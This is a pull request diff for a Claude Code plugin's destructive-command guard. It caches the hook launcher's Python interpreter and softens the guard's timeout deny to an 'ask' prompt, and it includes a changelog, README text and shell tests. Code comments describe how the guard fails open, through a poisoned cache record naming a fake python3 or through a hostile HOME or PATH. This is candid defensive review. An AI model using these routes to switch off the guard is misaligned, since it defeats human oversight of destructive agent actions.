### PR TITLE
perf(disk-hygiene): cut the destructive guard's per-call spawns 4 to 1, and stop its watchdog blocking commands it never judged

### DIFF
--- a/plugins/disk-hygiene/.claude-plugin/plugin.json
+++ b/plugins/disk-hygiene/.claude-plugin/plugin.json
@@ -1,7 +1,7 @@
 {
   "$schema": "https://json.schemastore.org/claude-code-plugin-manifest.json",
   "name": "disk-hygiene",
-  "version": "0.20.35",
+  "version": "0.21.0",
   "description": "Context-aware disk hygiene for arbitrary directory trees: inventories orphaned and temporary artifacts, classifies evidence into review tiers, and offers exact-path cleanup only after a fresh safety preview and explicit per-tier approval. The target is read-only by default; OS-managed paths, links and mount points, VCS-tracked content without the complete checkout evidence bundle, changed entries, and live-handle uncertainty fail closed.",
   "author": {
     "name": "Melodic Software",

--- a/plugins/disk-hygiene/CHANGELOG.md
+++ b/plugins/disk-hygiene/CHANGELOG.md
@@ -15,13 +15,20 @@ All notable changes to the `disk-hygiene` plugin are documented here. Format fol
   `_engine_gate_relevant`'s marker-free fallback, and the blanket `exit 2` then
   BLOCKED it — observed about six times in one session, each succeeding on an
   identical retry. At expiry the guard now distinguishes "could not decide"
-  from "decided deny": a command carrying the engine marker still exits 2 with
-  the same diagnostic, a provably marker-free one emits `ask`, and a stall
-  before the payload parses still denies. `ask` is strictly more protective
-  than the plugin-level defer it replaces (which emits no decision at all) and
-  strictly less blocking than the `exit 2` it replaces. Every path still
-  delivers a decision, so the killed-hook fail-open ADR 0004 documents stays
-  closed. Decision emission is now serialized and latched to one object,
+  from "decided deny", and the downgrade is available in exactly one situation:
+  **`engine-gate` mode with a provably marker-free command**, where the
+  completed verdict would knowably have been the instant plugin-level defer, so
+  `ask` is strictly more protective than the outcome the guard would have
+  reached (a defer emits no decision at all and lets the command run) and
+  strictly less blocking than the `exit 2` it replaces. Everything else keeps
+  the pre-change deny: **`belt` mode always denies** — belt is the default the
+  skill-frontmatter registration runs under, since it passes no `--mode` and
+  `resolve_mode()` falls back to it, and there Bash is deny-by-default with
+  `_engine_gate_relevant` never consulted, so a marker-free `rm -rf` would have
+  been denied rather than deferred — as do a command carrying the engine marker
+  and a stall before the payload parses. Every path still delivers a decision,
+  so the killed-hook fail-open ADR 0004 documents stays closed. Decision
+  emission is now serialized and latched to one object,
   because two threads writing stdout would splice malformed JSON, which
   PreToolUse reads as no decision at all.
 

--- a/plugins/disk-hygiene/CHANGELOG.md
+++ b/plugins/disk-hygiene/CHANGELOG.md
@@ -3,6 +3,48 @@
 All notable changes to the `disk-hygiene` plugin are documented here. Format follows
 [Keep a Changelog](https://keepachangelog.com/en/1.1.0/); this plugin uses semantic versioning.
 
+## [0.21.0]
+
+### Changed
+
+- **The guard's watchdog no longer blocks commands it never judged.** The
+  internal deadline is wall-clock, so it measured contention as readily as it
+  measured a stall, and this hook fires on every `Bash`/`PowerShell` call in
+  every session. Under concurrent load an ordinary read-only command could
+  cross the 10s deadline while the guard was still inside
+  `_engine_gate_relevant`'s marker-free fallback, and the blanket `exit 2` then
+  BLOCKED it — observed about six times in one session, each succeeding on an
+  identical retry. At expiry the guard now distinguishes "could not decide"
+  from "decided deny": a command carrying the engine marker still exits 2 with
+  the same diagnostic, a provably marker-free one emits `ask`, and a stall
+  before the payload parses still denies. `ask` is strictly more protective
+  than the plugin-level defer it replaces (which emits no decision at all) and
+  strictly less blocking than the `exit 2` it replaces. Every path still
+  delivers a decision, so the killed-hook fail-open ADR 0004 documents stays
+  closed. Decision emission is now serialized and latched to one object,
+  because two threads writing stdout would splice malformed JSON, which
+  PreToolUse reads as no decision at all.
+
+### Performance
+
+- **The hook launcher resolves its interpreter once instead of on every tool
+  call.** It re-derived the interpreter every invocation: a `sed` read of the
+  engine for `MIN_PYTHON`, a whole extra Python spawned only to evaluate a
+  version predicate, a `dirname`, and on the `py` branch a third spawn.
+  Process creation is the dominant cost on Windows and the term that explodes
+  under concurrent load. Measured spawn census for one warm invocation,
+  counted through a `PATH` shim: **4 spawns to 1** — the remaining one is the
+  guard itself. Interleaved A/B over 24 alternating pairs on a Windows host:
+  p50 5446ms to 1418ms, p95 16991ms to 7874ms, median paired ratio 3.71x.
+  Resolution logic is unchanged and still runs on a cache miss; the floor is
+  now recovered inside the candidate interpreter, keeping `hygiene.MIN_PYTHON`
+  the single origin. The resolved interpreter is cached under
+  `$HOME/.cache/disk-hygiene`, keyed on the launcher's own (version-pinned)
+  directory and invalidated by `PATH` change, loss of executability, a
+  zero-length App Execution Alias stub, an interpreter newer than the record,
+  or TTL expiry. Any miss or corrupt record re-resolves; a cache failure can
+  never produce "no interpreter", which is the guard's silent fail-open.
+
 ## [0.20.35]
 
 ### Fixed

--- a/plugins/disk-hygiene/README.md
+++ b/plugins/disk-hygiene/README.md
@@ -236,10 +236,19 @@ measurements below carry the conditions they were taken under.
   per-tool-call ceiling. While the `clean` skill is loaded, its frontmatter registration is a
   second matching hook that the harness launches in parallel; the pair measured concurrently
   (`&` + `wait`, 60 pairs) walls at **≈ 320–410 ms**, ≈ 1.3–1.5× the same-batch single-hook wall
-  rather than double it. Of the single-hook cost, the launcher's read of the engine to recover
-  `MIN_PYTHON` (a single early-quit `sed` since 0.20.13, held to one read by
-  `hooks/run-python-hook.test.sh`) accounts for ≈ 24 ms, **≈ 13% of the hook's cost** in the batch
-  it was measured against; the prior two-full-pass form measured ≈ 38 ms (≈ 19% of a ≈ 205 ms hook).
+  rather than double it. **Superseded in 0.21.0 for the launcher portion:** the `sed` read of the
+  engine (≈ 24 ms, ≈ 13% of the hook's cost, and ≈ 38 ms in the two-full-pass form before 0.20.13)
+  no longer exists, and neither does the separate Python process that was spawned only to evaluate
+  the version predicate. The floor is now recovered inside the candidate interpreter on the cold
+  path, and the resolved interpreter is cached, so a **warm invocation spends one process spawn
+  (the guard itself) where it previously spent four** — `dirname`, `sed`, and two `python3`.
+  That spawn census, not a duration, is the durable figure: it is deterministic, whereas the
+  wall-clock share above was measured on a host whose process-creation cost was later observed
+  varying more than tenfold within a single hour under contention (`bash -c true` at 283 ms and
+  1825 ms in the same session at ~10% CPU). Interleaved before/after on such a host, 24 alternating
+  pairs, measured p50 5446 → 1418 ms and p95 16991 → 7874 ms; those absolute values are specific to
+  that contention and are not comparable to the ≈ 190–300 ms figures above, which were taken on a
+  quiet host. Re-measure per the convention's method on a quiet host before citing a new share.
   On a machine where no Python 3 interpreter resolves at all the gate fails
   open on every call, the `Stop` detector emits a `systemMessage` for that case, so the blind spot is
   visible rather than silent (#1110, #1504). **0.9.0 delta:** the gate no longer carries a `${user_config.*}`

--- a/plugins/disk-hygiene/hooks/run-python-hook.sh
+++ b/plugins/disk-hygiene/hooks/run-python-hook.sh
@@ -209,6 +209,16 @@ _cached_python3() {
   [[ "$schema" == "$_CACHE_SCHEMA" ]] || return 1
   [[ "$cached_path" == "$PATH" ]] || return 1
   [[ -n "$interp" && -x "$interp" && -s "$interp" ]] || return 1
+  # The hot path `exec`s this value, so the record is an input to a security
+  # control and is treated as untrusted: only a path resolution would itself
+  # have produced is accepted. Pure parameter expansion, so it costs no spawn.
+  # This is defence in depth rather than a boundary — anything able to write
+  # here can already edit the hook registrations that name this launcher.
+  local interp_base="${interp##*/}"
+  case "${interp_base%.exe}" in
+  python3 | python | py | python3.*) ;;
+  *) return 1 ;;
+  esac
   # An interpreter modified after this record was written is not the one that
   # was validated.
   [[ ! "$interp" -nt "$file" ]] || return 1
@@ -226,6 +236,9 @@ _store_python3() {
   local file="$1" interp="$2" dir temp now
   dir="${file%/*}"
   [[ -d "$dir" ]] || mkdir -p "$dir" 2>/dev/null || return 0
+  # Best-effort on POSIX hosts. MSYS `chmod` is close to a no-op against
+  # Windows ACLs, so this narrows exposure where it can and is not relied on:
+  # the read path validates the record rather than trusting its location.
   chmod 700 "$dir" 2>/dev/null || true
   printf -v now '%(%s)T' -1
   temp="$file.$$.tmp"

--- a/plugins/disk-hygiene/hooks/run-python-hook.sh
+++ b/plugins/disk-hygiene/hooks/run-python-hook.sh
@@ -238,9 +238,18 @@ _cached_python3() {
   # channel, and the plugin tree is not writable-adjacent to it, so the "anyone
   # who can write here can already edit the hook registration" argument does not
   # cover it. Recorded so a future reviewer weighs it deliberately.
+  # Split on BOTH separators. The `py -3` fallback resolves through
+  # `print(sys.executable)`, which on Windows returns a NATIVE backslash path
+  # (`C:\Users\...\python.exe`) — and that fallback exists precisely for hosts
+  # where neither `python3` nor `python` is on PATH. Stripping only `/` leaves
+  # the whole path in `interp_base`, the allowlist below never matches, and the
+  # cache misses on every invocation: the warm path would be dead on exactly
+  # the host class this branch was written for, silently and with no error.
   local interp_base="${interp##*/}"
-  case "${interp_base%.exe}" in
-  python3 | python | py | python3.*) ;;
+  interp_base="${interp_base##*\\}"
+  # Case-insensitive: Windows filenames are, and `PYTHON.EXE` is the same file.
+  case "${interp_base,,}" in
+  python3 | python | py | python3.* | python3.exe | python.exe | py.exe | python3.*.exe) ;;
   *) return 1 ;;
   esac
   # An interpreter modified after this record was written is not the one that

--- a/plugins/disk-hygiene/hooks/run-python-hook.sh
+++ b/plugins/disk-hygiene/hooks/run-python-hook.sh
@@ -161,8 +161,15 @@ resolve_python3() {
 # resolution. A cache failure must never be able to produce "no interpreter" —
 # that is the guard's silent fail-open (exit 0, nothing enforced).
 _CACHE_SCHEMA=1
-_CACHE_TTL_SECONDS="${DISK_HYGIENE_INTERPRETER_CACHE_TTL:-86400}"
-[[ "$_CACHE_TTL_SECONDS" =~ ^[0-9]+$ ]] || _CACHE_TTL_SECONDS=86400
+# COMPILED IN, deliberately not an environment override. A widened TTL makes
+# this launcher accept a record it would otherwise have rejected as stale, so
+# the knob is an env-borne input to a security control — the exact shape
+# `resolve_disk_hygiene_enabled` refuses on the Python side, because "a repo
+# `settings.json` `env` block reaches hook subprocesses and carries no
+# provenance a hook could check". A tunable staleness window is not worth a new
+# channel of that kind; an operator who needs re-resolution can delete the
+# record.
+_CACHE_TTL_SECONDS=86400
 
 # Every hot-path helper reports through a GLOBAL rather than stdout. Command
 # substitution — `x="$(f)"` — forks a subshell, and a subshell on Windows is a
@@ -210,10 +217,27 @@ _cached_python3() {
   [[ "$cached_path" == "$PATH" ]] || return 1
   [[ -n "$interp" && -x "$interp" && -s "$interp" ]] || return 1
   # The hot path `exec`s this value, so the record is an input to a security
-  # control and is treated as untrusted: only a path resolution would itself
-  # have produced is accepted. Pure parameter expansion, so it costs no spawn.
-  # This is defence in depth rather than a boundary — anything able to write
-  # here can already edit the hook registrations that name this launcher.
+  # control and is treated as untrusted: only a basename a resolution would
+  # itself have produced is accepted. Pure parameter expansion, so it costs no
+  # spawn.
+  #
+  # KNOWN LIMIT, stated rather than implied. This validates SHAPE, not identity:
+  # an executable, non-empty file merely NAMED `python3` is accepted and
+  # `exec`'d, the guard never runs, and the hook exits 0 having enforced
+  # nothing. Proving the binary is really Python means running it, which is the
+  # spawn this cache exists to remove, so the check cannot be strengthened
+  # without giving back the win.
+  #
+  # Reaching that requires writing the record, and the record's location
+  # derives from `$HOME` — so unlike the pre-cache launcher, `HOME` is now an
+  # input to this control. Two honest readings: if nothing untrusted can set
+  # `HOME` for hook subprocesses, this is unreachable; if something can, it is a
+  # new instance of an exposure that already exists, since a hostile `PATH`
+  # fails open on the pre-cache launcher too (`PYTHON_VERSION_PROBE` only checks
+  # an exit status, which any script satisfies). It is NOT a new KIND of
+  # channel, and the plugin tree is not writable-adjacent to it, so the "anyone
+  # who can write here can already edit the hook registration" argument does not
+  # cover it. Recorded so a future reviewer weighs it deliberately.
   local interp_base="${interp##*/}"
   case "${interp_base%.exe}" in
   python3 | python | py | python3.*) ;;

--- a/plugins/disk-hygiene/hooks/run-python-hook.sh
+++ b/plugins/disk-hygiene/hooks/run-python-hook.sh
@@ -240,7 +240,7 @@ _cached_python3() {
   # cover it. Recorded so a future reviewer weighs it deliberately.
   # Split on BOTH separators. The `py -3` fallback resolves through
   # `print(sys.executable)`, which on Windows returns a NATIVE backslash path
-  # (`C:\Users\...\python.exe`) — and that fallback exists precisely for hosts
+  # (`<drive>:\<path>\python.exe`) — and that fallback exists precisely for hosts
   # where neither `python3` nor `python` is on PATH. Stripping only `/` leaves
   # the whole path in `interp_base`, the allowlist below never matches, and the
   # cache misses on every invocation: the warm path would be dead on exactly
@@ -248,8 +248,10 @@ _cached_python3() {
   local interp_base="${interp##*/}"
   interp_base="${interp_base##*\\}"
   # Case-insensitive: Windows filenames are, and `PYTHON.EXE` is the same file.
+  # `python3.*` already covers `python3.exe`, `python3.13` and `python3.13.exe`;
+  # spelling those separately is what SC2221/SC2222 flag as dead patterns.
   case "${interp_base,,}" in
-  python3 | python | py | python3.* | python3.exe | python.exe | py.exe | python3.*.exe) ;;
+  python3 | python | py | python3.* | python.exe | py.exe) ;;
   *) return 1 ;;
   esac
   # An interpreter modified after this record was written is not the one that

--- a/plugins/disk-hygiene/hooks/run-python-hook.sh
+++ b/plugins/disk-hygiene/hooks/run-python-hook.sh
@@ -30,33 +30,56 @@
 #   * destructive_guard.py — exit 0 silently (existing PreToolUse fail-open).
 set -uo pipefail
 
-SCRIPT_DIR="$(cd "$(dirname "${BASH_SOURCE[0]}")" && pwd)"
-ENGINE="$SCRIPT_DIR/../skills/clean/scripts/hygiene.py"
-# One read of the engine, stopped at the MIN_PYTHON line (#2853). This launcher
-# sits behind an always-on `Bash|PowerShell` PreToolUse matcher, so every shell
-# tool call pays whatever happens here.
-#
-# The ADDRESS BLOCK is what makes it stop. The obvious one-liner
-# `sed -n 's/^MIN_PYTHON = (...).*/\1 \2/p;/^MIN_PYTHON/q'` does NOT quit: by
-# the time `q`'s address is evaluated, `s///` has already rewritten the pattern
-# space to `3 11`, so `/^MIN_PYTHON/` never matches and sed still reads to EOF.
-# Addressing the block on the ORIGINAL line and quitting inside it is what makes
-# the read terminate at the match.
-#
-# First-match-wins is safe because the engine has exactly one `^MIN_PYTHON` line
-# (`grep -c '^MIN_PYTHON'` = 1) and test_hygiene.py's VersionFloorTests locks
-# both that count and the line's shape. hygiene.MIN_PYTHON remains the single
-# origin of the floor (#1028); this refines how it is read, not where it lives.
-# hooks/run-python-hook.test.sh holds the one-read + stops-at-the-match contract.
-MIN_PYTHON_FLOOR="$(sed -n '/^MIN_PYTHON = (/{s/^MIN_PYTHON = (\([0-9]*\), \([0-9]*\)).*/\1 \2/p;q;}' "$ENGINE")"
-MIN_PYTHON_MAJOR=""
-MIN_PYTHON_MINOR=""
-read -r MIN_PYTHON_MAJOR MIN_PYTHON_MINOR <<<"$MIN_PYTHON_FLOOR" || true
-if [[ -z "$MIN_PYTHON_MAJOR" || -z "$MIN_PYTHON_MINOR" ]]; then
-  MIN_PYTHON_MAJOR=3
-  MIN_PYTHON_MINOR=11
+# `$(cd ... && pwd)` forks twice (command substitution plus `dirname`) on a path
+# every registered caller already passes ABSOLUTE — hooks.json and the skill
+# frontmatter both spell it `"${CLAUDE_PLUGIN_ROOT}"/hooks/run-python-hook.sh`.
+# Strip the trailing component with parameter expansion in that case and keep
+# the fork for the relative spelling (a test harness, or a hand `./` run), which
+# is the only one that needs normalising.
+_SOURCE_DIR="${BASH_SOURCE[0]%/*}"
+if [[ "$_SOURCE_DIR" == "${BASH_SOURCE[0]}" ]]; then
+  _SOURCE_DIR="."
 fi
-PYTHON_VERSION_PROBE="import sys; raise SystemExit(0 if sys.version_info >= ($MIN_PYTHON_MAJOR, $MIN_PYTHON_MINOR) else 1)"
+case "$_SOURCE_DIR" in
+/* | ?:[/\\]*) SCRIPT_DIR="$_SOURCE_DIR" ;;
+*) SCRIPT_DIR="$(cd "$_SOURCE_DIR" && pwd)" ;;
+esac
+ENGINE="$SCRIPT_DIR/../skills/clean/scripts/hygiene.py"
+
+# Interpreter resolution is COLD-PATH ONLY (#3502). This launcher sits behind an
+# always-on `Bash|PowerShell` PreToolUse matcher, so every shell tool call in
+# every session pays whatever happens here — and what happened here was 2-3
+# extra process spawns before the guard even started: a `sed` read of the engine
+# to recover `MIN_PYTHON`, a whole extra Python launched solely to evaluate a
+# version predicate, and on the `py` branch a third. Process creation is the
+# dominant cost on Windows (EDR scans every image), and it is the term that
+# explodes under concurrent load, which is exactly when the guard's own watchdog
+# was firing and denying benign read-only commands.
+#
+# The resolution logic itself is unchanged and still runs whenever the cache
+# does not answer — it exists for real reasons (WindowsApps App Execution Alias
+# stubs, the `py` launcher fallback, the minimum-version floor). It just no
+# longer runs on every invocation.
+#
+# `PYTHON_VERSION_PROBE` now recovers the floor from the engine ITSELF, inside
+# the candidate interpreter, so the cold path spends ONE spawn per candidate
+# instead of a `sed` plus a Python. `hygiene.MIN_PYTHON` remains the single
+# origin of the floor (#1028) — this changes who reads it, not where it lives —
+# and the hardcoded fallback below still applies when the engine is unreadable.
+PYTHON_VERSION_PROBE='
+import re, sys
+floor = (3, 11)
+try:
+    with open(sys.argv[1], encoding="utf-8") as handle:
+        for line in handle:
+            found = re.match(r"^MIN_PYTHON = \((\d+), (\d+)\)$", line.rstrip("\n"))
+            if found:
+                floor = (int(found.group(1)), int(found.group(2)))
+                break
+except OSError:
+    pass
+raise SystemExit(0 if sys.version_info >= floor else 1)
+'
 
 SCRIPT="${1:-}"
 shift || true
@@ -92,7 +115,7 @@ resolve_python3() {
     if _is_store_alias_stub "$resolved"; then
       continue
     fi
-    if "$resolved" -c "$PYTHON_VERSION_PROBE" 2>/dev/null; then
+    if "$resolved" -c "$PYTHON_VERSION_PROBE" "$ENGINE" 2>/dev/null; then
       printf '%s' "$resolved"
       return 0
     fi
@@ -100,7 +123,7 @@ resolve_python3() {
 
   if command -v py >/dev/null 2>&1; then
     resolved="$(py -3 -c 'import sys; print(sys.executable)' 2>/dev/null)" || return 1
-    if [[ -n "$resolved" ]] && "$resolved" -c "$PYTHON_VERSION_PROBE" 2>/dev/null; then
+    if [[ -n "$resolved" ]] && "$resolved" -c "$PYTHON_VERSION_PROBE" "$ENGINE" 2>/dev/null; then
       printf '%s' "$resolved"
       return 0
     fi
@@ -109,9 +132,134 @@ resolve_python3() {
   return 1
 }
 
+# --- resolved-interpreter cache -------------------------------------------
+#
+# The hot path must reach `exec` with ZERO extra process spawns, so every check
+# below is a bash BUILTIN (`[[ -x ]]`, `[[ -s ]]`, `[[ -nt ]]`, `read`,
+# `printf '%(%s)T'`). Anything that shells out here would reintroduce the cost
+# this cache exists to remove.
+#
+# Cache location is derived from `$HOME` and this script's own directory and
+# NOTHING else. That is a hard constraint, not a preference: the skill-
+# frontmatter registration may substitute only `${CLAUDE_PLUGIN_ROOT}` — a skill
+# hook receives no `${CLAUDE_PLUGIN_DATA}` and no `${user_config.*}`, and either
+# makes Claude Code refuse the launch outright (#1014). `SCRIPT_DIR` is already
+# version-pinned (`.../disk-hygiene/<version>/hooks`), so a plugin upgrade lands
+# on a different key and cannot read a stale entry.
+#
+# INVALIDATION, in the order the hot path checks it:
+#   1. schema tag mismatch      — a launcher upgrade rewrote the record shape;
+#   2. `PATH` differs verbatim  — a different `python3` may now win the lookup;
+#   3. interpreter not executable / zero-length — removed, or replaced by a
+#      WindowsApps App Execution Alias stub since the entry was written;
+#   4. interpreter NEWER than the cache file (`-nt`) — an in-place upgrade;
+#   5. TTL expiry — the backstop for the residual case none of the above sees:
+#      a NEW interpreter installed into an existing `PATH` directory with a
+#      preserved (older) mtime. Bounded staleness, not correctness, is what the
+#      TTL buys; every other shape is caught structurally above.
+# Any miss, unreadable record, or malformed field falls through to full
+# resolution. A cache failure must never be able to produce "no interpreter" —
+# that is the guard's silent fail-open (exit 0, nothing enforced).
+_CACHE_SCHEMA=1
+_CACHE_TTL_SECONDS="${DISK_HYGIENE_INTERPRETER_CACHE_TTL:-86400}"
+[[ "$_CACHE_TTL_SECONDS" =~ ^[0-9]+$ ]] || _CACHE_TTL_SECONDS=86400
+
+# Every hot-path helper reports through a GLOBAL rather than stdout. Command
+# substitution — `x="$(f)"` — forks a subshell, and a subshell on Windows is a
+# real process spawn (MSYS emulates `fork`), which is the exact cost this cache
+# exists to remove. Assigning a global keeps the whole hit path in-process.
+_CACHE_FILE=""
+_RESOLVED_INTERPRETER=""
+
+_cache_file_path() {
+  _CACHE_FILE=""
+  local home="${HOME:-}"
+  [[ -n "$home" && -d "$home" ]] || return 1
+  # `PATH` is compared verbatim inside the record; a newline in it would break
+  # the line-oriented format, so such an environment simply goes uncached.
+  [[ "$PATH" != *$'\n'* ]] || return 1
+  local key="${SCRIPT_DIR//[^a-zA-Z0-9]/_}"
+  # Bound the filename without `${key: -96}`: a negative offset whose magnitude
+  # exceeds the string length yields the EMPTY string in bash, which would
+  # collapse every plugin root onto one shared record.
+  if ((${#key} > 96)); then
+    key="${key:${#key}-96}"
+  fi
+  _CACHE_FILE="$home/.cache/disk-hygiene/interpreter-$key"
+}
+
+# Set `_RESOLVED_INTERPRETER` from a still-valid cache record, or return 1.
+# Builtins only — no forks, no spawns.
+_cached_python3() {
+  local file="$1"
+  _RESOLVED_INTERPRETER=""
+  [[ -f "$file" && -r "$file" ]] || return 1
+  local schema="" cached_path="" interp="" written="" line
+  while IFS= read -r line || [[ -n "$line" ]]; do
+    case "$line" in
+    "schema="*) schema="${line#schema=}" ;;
+    "written="*) written="${line#written=}" ;;
+    "interpreter="*) interp="${line#interpreter=}" ;;
+    # PATH last: it is the only field that may itself contain `=`.
+    "path="*) cached_path="${line#path=}" ;;
+    *) ;;
+    esac
+  done <"$file"
+
+  [[ "$schema" == "$_CACHE_SCHEMA" ]] || return 1
+  [[ "$cached_path" == "$PATH" ]] || return 1
+  [[ -n "$interp" && -x "$interp" && -s "$interp" ]] || return 1
+  # An interpreter modified after this record was written is not the one that
+  # was validated.
+  [[ ! "$interp" -nt "$file" ]] || return 1
+  [[ "$written" =~ ^[0-9]+$ ]] || return 1
+  local now
+  printf -v now '%(%s)T' -1
+  ((now >= written)) || return 1
+  ((now - written < _CACHE_TTL_SECONDS)) || return 1
+  _RESOLVED_INTERPRETER="$interp"
+}
+
+# Persist a validated interpreter. Best-effort throughout: a write failure
+# leaves the next invocation to re-resolve, which is slow, never wrong.
+_store_python3() {
+  local file="$1" interp="$2" dir temp now
+  dir="${file%/*}"
+  [[ -d "$dir" ]] || mkdir -p "$dir" 2>/dev/null || return 0
+  chmod 700 "$dir" 2>/dev/null || true
+  printf -v now '%(%s)T' -1
+  temp="$file.$$.tmp"
+  {
+    printf 'schema=%s\n' "$_CACHE_SCHEMA"
+    printf 'written=%s\n' "$now"
+    printf 'interpreter=%s\n' "$interp"
+    printf 'path=%s\n' "$PATH"
+  } >"$temp" 2>/dev/null || {
+    rm -f "$temp" 2>/dev/null || true
+    return 0
+  }
+  # Concurrent hooks race to publish; `mv` is atomic within a filesystem, so the
+  # loser's record is replaced rather than interleaved with the winner's.
+  mv -f "$temp" "$file" 2>/dev/null || rm -f "$temp" 2>/dev/null || true
+  return 0
+}
+
 PYTHON=""
-if ! PYTHON="$(resolve_python3)"; then
-  PYTHON=""
+_cache_file_path || true
+
+# Hot path: a valid record reaches `exec` having spawned nothing at all.
+if [[ -n "$_CACHE_FILE" ]] && _cached_python3 "$_CACHE_FILE"; then
+  PYTHON="$_RESOLVED_INTERPRETER"
+fi
+
+# Cold path: full resolution, then publish for the next invocation.
+if [[ -z "$PYTHON" ]]; then
+  if ! PYTHON="$(resolve_python3)"; then
+    PYTHON=""
+  fi
+  if [[ -n "$PYTHON" && -n "$_CACHE_FILE" ]]; then
+    _store_python3 "$_CACHE_FILE" "$PYTHON"
+  fi
 fi
 
 if [[ -z "$PYTHON" ]]; then

--- a/plugins/disk-hygiene/hooks/run-python-hook.test.sh
+++ b/plugins/disk-hygiene/hooks/run-python-hook.test.sh
@@ -292,6 +292,34 @@ else
   assert_eq "and the target still runs under a real interpreter" \
     "ran" "$([[ -e "$FIXTURE_MARKER" ]] && printf 'ran' || printf 'skipped')"
 
+  # A NATIVE WINDOWS interpreter path must be accepted from the cache.
+  #
+  # The `py -3` fallback resolves through `print(sys.executable)`, which on
+  # Windows emits `C:\...\python.exe`. A basename check that split only on `/`
+  # left the whole backslash path in place, the allowlist never matched, and the
+  # record was rejected on EVERY invocation — so the warm path was dead on
+  # exactly the host class the `py` fallback exists for (neither `python3` nor
+  # `python` on PATH), silently and with no error. Nothing in the previous
+  # contract set caught it, because every path this suite produced was POSIX.
+  if command -v cygpath >/dev/null 2>&1; then
+    cache_launch >/dev/null
+    native_shim="$(cygpath -w "$CACHE_BIN/python3")"
+    {
+      printf 'schema=1\n'
+      printf 'written=%s\n' "$(date +%s)"
+      printf 'interpreter=%s\n' "$native_shim"
+      printf 'path=%s\n' "$CACHE_BIN:$PATH"
+    } >"$cache_record"
+    rm -f "$FIXTURE_MARKER"
+    native_calls="$(cache_launch)"
+    assert_eq "a native Windows interpreter path is accepted from the cache" \
+      "1" "$native_calls"
+    assert_eq "and the target runs under it" \
+      "ran" "$([[ -e "$FIXTURE_MARKER" ]] && printf 'ran' || printf 'skipped')"
+  else
+    printf 'SKIP: no cygpath; native-path cache acceptance not exercised\n'
+  fi
+
   # An unwritable cache directory must not stop the launcher from working.
   NOCACHE_HOME="$CACHE_ROOT/home-readonly"
   mkdir -p "$NOCACHE_HOME"

--- a/plugins/disk-hygiene/hooks/run-python-hook.test.sh
+++ b/plugins/disk-hygiene/hooks/run-python-hook.test.sh
@@ -33,30 +33,26 @@ assert_contains() {
   fi
 }
 
-# --- the engine is read ONCE per launch, and that read stops at MIN_PYTHON ---
+# --- the engine is NOT read by this launcher, and the floor still comes from it ---
 #
-# #2853. This launcher sits behind an always-on `Bash|PowerShell` PreToolUse
-# matcher, so every shell tool call in every session pays whatever it does here.
-# It used to run two separate full-file `sed` passes over the ~3,500-line
-# engine, neither of which stopped at the match, to recover one constant that
-# sits near the top of the file.
+# #3502, superseding #2853. #2853 made the launcher's `sed` read of the engine a
+# single read that stopped at the `MIN_PYTHON` line, and the previous revision of
+# this file held that reader to a one-read/stops-at-the-match contract. That
+# reader no longer exists: recovering the floor now happens INSIDE the candidate
+# interpreter, on the cold path only, so the launcher spends one process spawn
+# per candidate where it used to spend a `sed` plus a whole extra Python.
 #
-# Both assertions below are BEHAVIORAL, not spelling checks. They observe the
-# reader the launcher actually runs, through a `sed` shim on PATH that records
-# each invocation's argv and delegates to the real sed:
+# The contract that replaces it has two halves, because deleting a cost must not
+# quietly delete the property that cost was buying:
 #
-#   1. exactly one recorded invocation names the engine;
-#   2. replaying that recorded argv against a fixture whose FIRST `MIN_PYTHON`
-#      line is `(3, 14)` and whose LAST LINE is `MIN_PYTHON = (9, 99)` prints
-#      exactly one line. A reader that scanned to EOF could not print one match
-#      when a second match sits on the final line, so one line is proof the read
-#      terminated at the first match.
+#   1. no launch reads the engine through `sed` at all — the recorded-argv shim
+#      below observes zero invocations naming the engine;
+#   2. `hygiene.MIN_PYTHON` is still the single origin of the floor (#1028) and
+#      is still ENFORCED — proven behaviorally against fixture engines, by
+#      observing whether the launcher runs its target at all.
 #
-# Assertion 2 is what a naive single-pass cannot fake: the tempting one-liner
-# `sed -n 's/^MIN_PYTHON = (...).*/\1 \2/p;/^MIN_PYTHON/q'` halves the passes but
-# never quits, because `q`'s address sees the already-substituted pattern space.
-# The fixture's floor values are deliberately NOT the real 3/11, so the
-# launcher's hardcoded fallback cannot be mistaken for a pass.
+# Half 2 is what a "delete the reader" regression cannot fake. A launcher that
+# stopped consulting the engine would run its target under both fixtures.
 SED_REAL="$(command -v sed)"
 PROBE_DIR="$(mktemp -d)"
 # NOTE: the later `trap ... EXIT` in this file REPLACES this one rather than
@@ -64,7 +60,8 @@ PROBE_DIR="$(mktemp -d)"
 trap 'rm -rf "$PROBE_DIR"' EXIT
 PROBE_BIN="$PROBE_DIR/bin"
 PROBE_CALLS="$PROBE_DIR/calls"
-mkdir -p "$PROBE_BIN" "$PROBE_CALLS"
+PROBE_HOME="$PROBE_DIR/home"
+mkdir -p "$PROBE_BIN" "$PROBE_CALLS" "$PROBE_HOME"
 
 cat >"$PROBE_BIN/sed" <<'SHIM'
 #!/usr/bin/env bash
@@ -88,25 +85,15 @@ SHIM
 chmod +x "$PROBE_BIN/sed"
 
 # No interpreter resolves under this PATH, so the launcher takes its documented
-# guard fail-open (exit 0) instead of spawning Python. The engine read happens
-# before interpreter resolution either way, which is the whole point.
+# guard fail-open (exit 0). Whether it reads the engine is independent of that.
 for stub in python3 python py; do
   printf '#!/usr/bin/env bash\nexit 127\n' >"$PROBE_BIN/$stub"
   chmod +x "$PROBE_BIN/$stub"
 done
 
-PROBE_FIXTURE="$PROBE_DIR/fixture.py"
-{
-  printf '%s\n' '"""Fixture engine for the single-read contract."""'
-  printf '%s\n' 'MIN_PYTHON = (3, 14)'
-  for ((_filler = 0; _filler < 400; _filler++)); do
-    printf '%s\n' 'FILLER = 0'
-  done
-  printf '%s\n' 'MIN_PYTHON = (9, 99)'
-} >"$PROBE_FIXTURE"
-
 RUN_PYTHON_HOOK_SED="$SED_REAL" \
   RUN_PYTHON_HOOK_CALLS="$PROBE_CALLS" \
+  HOME="$PROBE_HOME" \
   PATH="$PROBE_BIN:$PATH" \
   bash "$LAUNCHER" \
   "$SCRIPT_DIR/../skills/clean/scripts/destructive_guard.py" \
@@ -117,39 +104,171 @@ for call in "$PROBE_CALLS"/call-*; do
   [[ -e "$call" ]] || continue
   engine_reads=$((engine_reads + 1))
 done
-assert_eq "one hook launch reads the engine exactly once" "1" "$engine_reads"
+assert_eq "the launcher never sed-reads the engine" "0" "$engine_reads"
 
-if [[ "$engine_reads" -ne 1 ]]; then
-  fail "cannot check the stop-at-match contract without exactly one recorded read"
+# --- the floor is still read from the engine, and still enforced ---
+#
+# A fixture plugin tree: a verbatim copy of the launcher, a fixture engine
